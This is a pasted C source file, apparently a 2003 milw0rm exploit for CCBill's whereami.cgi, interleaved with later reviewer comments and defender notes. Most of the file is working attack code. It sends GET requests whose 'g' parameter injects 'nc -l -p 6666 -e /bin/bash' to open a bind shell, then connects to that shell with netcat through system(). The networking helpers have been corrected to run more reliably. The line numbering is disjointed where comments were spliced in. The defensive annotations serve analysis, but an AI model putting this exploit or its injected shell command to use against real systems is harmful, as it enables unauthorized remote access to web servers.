FlyFar

CCBILL CGI - 'ccbillx.c' 'whereami.cgi' Remote Code Execution

Feb 2nd, 2024
  1. /*
  2. * =====================================
  3. * CCBILL CGI Remote Exploit for /ccbill/whereami.cgi
  4. * By: Knight420
  5. * 7/07/03
  6. *
  7. * spawns a shell with netcat and attempts to connect
  8. * into the server on port 6666 to gain access of the
  9. * webserver uid
  10. *
  11. * (C) COPYRIGHT Blue Ballz , 2003
  12. * all rights reserved
  13. * =====================================
  14. *
  15. */
  16.  
  17. #include <sys/types.h>
  18. #include <sys/time.h>
  19. #include <sys/socket.h>
  20. #include <netinet/in.h>
  21. #include <arpa/inet.h>
  22. #include <unistd.h>
  23. #include <errno.h>
  24. #include <stdlib.h>
  25. #include <stdio.h>
  26. #include <string.h>
  27. #include <fcntl.h>
  28. #include <netdb.h>
  29.  
  30.  
  /* Forward declarations for the two networking helpers defined after main(). */
  unsigned long int   net_resolve (char *host);
  int         net_connect (struct sockaddr_in *cs, char *server,
              unsigned short int port, int sec);

  /*
   * Request buffer that main() writes to the target in a single write().
   *
   * It holds three GET request lines, one per candidate location of
   * whereami.cgi (/ccbill/, /cgi-bin/ccbill/, /cgi-bin/).  Each carries the
   * URL-encoded command "nc -l -p 6666 -e /bin/bash" in the "g" query
   * parameter.  The file header describes the effect as a netcat-spawned shell
   * listening on port 6666 under the web server's uid.
   * NOTE(review): the CGI itself is not on this page; presumably it hands "g"
   * to a shell unsanitised -- confirm against the script.
   *
   * What a defender can take from this listing:
   *   - access-log entries for whereami.cgi whose "g" parameter contains a
   *     command line (here the strings "nc%20-l" and "/bin/bash");
   *   - a new TCP listener on port 6666 owned by the web server account;
   *   - an inbound connection to that port shortly after the HTTP request.
   * Removing or access-restricting the diagnostic script, and filtering
   * inbound traffic to ports that are not published services, addresses both
   * stages.  The page names no fixed version.
   */
  unsigned char ccbill[] =
  "GET /ccbill/whereami.cgi?g=nc%20-l%20-p%206666%20-e%20/bin/bash HTTP/1.0\x0d\x0a"
  "GET /cgi-bin/ccbill/whereami.cgi?g=nc%20-l%20-p%206666%20-e%20/bin/bash HTTP/1.0\x0d\x0a"
  "GET /cgi-bin/whereami.cgi?g=nc%20-l%20-p%206666%20-e%20/bin/bash HTTP/1.0\x0d\x0a";
  39.  
  /*
   * main - command-line driver: <host> <port>.
   *
   * Sequence visible in the code, useful when reconstructing a timeline from
   * logs or a packet capture:
   *   1. one TCP connection to host:port (35 second connect timeout);
   *   2. the whole ccbill[] buffer is written in one call, followed by a
   *      one second sleep and a close;
   *   3. the local "nc" binary is started against TCP port 6666 on the same
   *      host.
   * Steps 1 and 3 come from the same client address, about a second apart.
   *
   * Exits with EXIT_FAILURE on bad usage or connect failure, EXIT_SUCCESS
   * otherwise (regardless of whether the follow-up connection succeeded).
   */
  int
  main (int argc, char **argv)
  {
      /* NOTE(review): this local shadows socket(2) inside main(). */
      int         socket;
      /* Name of the environment variable used to pass the host to system(). */
      char  *TARGET     =     "TARGET";
      char            *server;
      unsigned short int  port;
      struct sockaddr_in  sa;

      if (argc != 3) {
          system("clear");
          /*
           * NOTE(review): the format string contains %s but no argument is
           * supplied, which is undefined behaviour.
           */
          printf ("[CCBILL CGI Remote Exploit By:Knight420]\n"
          "usage: %s <host> <port>\n");
          exit (EXIT_FAILURE);
      }
      /* Export the host so the shell started by system() below can expand it. */
      setenv (TARGET, argv[1], 1);
      server = argv[1];
      /* atoi() reports no errors; a non-numeric argument yields port 0. */
      port = atoi (argv[2]);

      socket = net_connect (&sa, server, port, 35);
      if (socket <= 0) {
          perror ("net_connect");
          exit (EXIT_FAILURE);
      }

      /*
       * The return value of write() is not checked, and ccbill is an
       * unsigned char array passed to strlen(), which expects const char *.
       */
      write (socket, ccbill, strlen (ccbill));
      sleep (1);
      close (socket);

      printf ("[CCBILL CGI Remote Exploit By:Knight420]\n");
      /* The extra "server" argument has no matching conversion and is ignored. */
      printf ("[1] evil data sent.\n", server);
      printf ("[2] connecting to shell.\n", server);
      /*
       * ${TARGET} is expanded unquoted by the local shell, so the value is
       * subject to word splitting there.
       */
      system("nc ${TARGET} 6666 || echo '[-]Exploit failed!'");
      exit (EXIT_SUCCESS);
  }
  75.  
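  /*
   * net_resolve - turn a dotted-quad string or host name into an IPv4 address.
   *
   * host: NUL-terminated dotted-quad or host name; NULL is rejected.
   *
   * Returns the address in network byte order, or 0 when host is NULL or
   * cannot be resolved to an IPv4 address.
   *
   * Fixes over the original:
   *   - inet_addr() failure was detected by storing the result in a long and
   *     comparing with -1.  Where long is wider than in_addr_t that comparison
   *     is never true, so host names were never looked up.
   *   - the resolved address was read through an (unsigned long *) cast, which
   *     reads past the 4-byte address where long is 8 bytes and ignores
   *     alignment.  It is now copied with memcpy after checking the record's
   *     family and length.
   */
  unsigned long int
  net_resolve (char *host)
  {
      in_addr_t       addr;
      struct hostent  *he;

      if (host == NULL)
          return (0);

      addr = inet_addr (host);
      if (addr != INADDR_NONE)
          return (addr);

      /*
       * INADDR_NONE is also the encoding of 255.255.255.255, so that literal
       * takes the lookup path as well.
       */
      he = gethostbyname (host);
      if (he == NULL || he->h_addrtype != AF_INET
          || he->h_length != (int) sizeof (addr)
          || he->h_addr_list[0] == NULL)
          return (0);

      memcpy (&addr, he->h_addr_list[0], sizeof (addr));
      return (addr);
  }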
  94.  
  95.  
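  /*
   * net_connect - open a TCP connection to server:port with a connect timeout.
   *
   * cs:     caller-provided address structure; family, port and address are
   *         filled in here.
   * server: dotted-quad or host name, resolved through net_resolve().
   * port:   TCP port in host byte order.
   * sec:    seconds to wait for the non-blocking connect to complete.
   *
   * Returns a connected descriptor with its original file status flags
   * restored, or -1 on failure with errno describing the error where one is
   * available (ETIMEDOUT when the wait expires).
   *
   * Fixes over the original:
   *   - every failure after socket() now closes the descriptor; several paths
   *     (select error, SO_ERROR failure, final fcntl) used to leak it.
   *   - errno is preserved across the close().
   *   - the getsockopt() length argument is a socklen_t, not an int.
   *   - descriptors that do not fit in an fd_set are rejected before FD_SET.
   */
  int
  net_connect (struct sockaddr_in *cs, char *server,
      unsigned short int port, int sec)
  {
      int             n, error, flags, saved_errno;
      int             fd;
      socklen_t       len;
      struct timeval  tv;
      fd_set          rset, wset;

      /* first allocate a socket */
      cs->sin_family = AF_INET;
      cs->sin_port = htons (port);
      fd = socket (cs->sin_family, SOCK_STREAM, 0);
      if (fd == -1)
          return (-1);

      /* FD_SET on a descriptor >= FD_SETSIZE is undefined behaviour. */
      if (fd >= FD_SETSIZE) {
          errno = EINVAL;
          goto fail;
      }

      cs->sin_addr.s_addr = net_resolve (server);
      if (cs->sin_addr.s_addr == 0)
          goto fail;

      /* Switch to non-blocking mode so connect() can be bounded by select(). */
      flags = fcntl (fd, F_GETFL, 0);
      if (flags == -1)
          goto fail;
      if (fcntl (fd, F_SETFL, flags | O_NONBLOCK) == -1)
          goto fail;

      n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
      if (n < 0 && errno != EINPROGRESS)
          goto fail;
      if (n == 0)
          goto done;      /* connected immediately */

      FD_ZERO (&rset);
      FD_ZERO (&wset);
      FD_SET (fd, &rset);
      FD_SET (fd, &wset);
      tv.tv_sec = sec;
      tv.tv_usec = 0;

      n = select (fd + 1, &rset, &wset, NULL, &tv);
      if (n == 0) {
          errno = ETIMEDOUT;
          goto fail;
      }
      if (n == -1)
          goto fail;

      if (!FD_ISSET (fd, &rset) && !FD_ISSET (fd, &wset))
          goto fail;

      /*
       * As in the original, the pending socket error is consulted only when
       * the descriptor is reported both readable and writable; a descriptor
       * reported in just one set is treated as connected.
       */
      if (FD_ISSET (fd, &rset) && FD_ISSET (fd, &wset)) {
          error = 0;
          len = sizeof (error);
          if (getsockopt (fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
              /* kept from the original: reported to the caller as a timeout */
              errno = ETIMEDOUT;
              goto fail;
          }
          if (error != 0) {
              errno = error;
              goto fail;
          }
      }

  done:
      /* Restore the file status flags the descriptor started with. */
      if (fcntl (fd, F_SETFL, flags) == -1)
          goto fail;

      return (fd);

  fail:
      saved_errno = errno;
      close (fd);
      errno = saved_errno;
      return (-1);
  }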
  180.  
  181. // milw0rm.com [2003-07-10]
  182.            